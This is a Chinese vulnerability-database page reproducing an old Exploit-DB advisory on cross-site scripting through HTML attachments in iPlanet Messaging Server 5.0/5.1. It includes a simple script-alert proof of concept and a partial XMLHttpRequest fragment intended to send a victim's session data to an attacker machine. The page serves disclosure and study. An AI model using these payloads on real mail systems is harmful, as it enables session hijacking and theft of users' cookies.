iPlanet Messaging Server 5.0/5.1 – HTML Attachment Cross-Site Scripting

iPlanet Messaging Server 5.0/5.1 – HTML Attachment Cross-Site Scripting

漏洞ID 1053894 漏洞类型
发布时间 2003-05-27 更新时间 2003-05-27
图片[1]-iPlanet Messaging Server 5.0/5.1 – HTML Attachment Cross-Site Scripting-安全小百科CVE编号 N/A
图片[2]-iPlanet Messaging Server 5.0/5.1 – HTML Attachment Cross-Site Scripting-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22662
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7704/info

It has been reported that iPlanet Messaging Server may be prone to cross-site scripting attacks. The problem is said to occur while processing HTML attachments received via e-mail. If successfully exploited, a malicious HTML file may be used to steal an unsuspecting users iPlanet Messaging cookies. Other attacks may also be possible. 

<html>
<script>alert(document.URL)</script>
</html>

The following script code has been provided to demonstrate indirect session hijacking using web redirection:

function%20steal(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","<URL_to_spoof>",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;

"xmldoc" can be redirected with a "img src", "window.open", to the attacker machine.

相关推荐: NetWin DMail ETRN Buffer Overflow Vulnerability

NetWin DMail ETRN Buffer Overflow Vulnerability 漏洞ID 1104122 漏洞类型 Boundary Condition Error 发布时间 2000-06-01 更新时间 2000-06-01 CVE编号 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享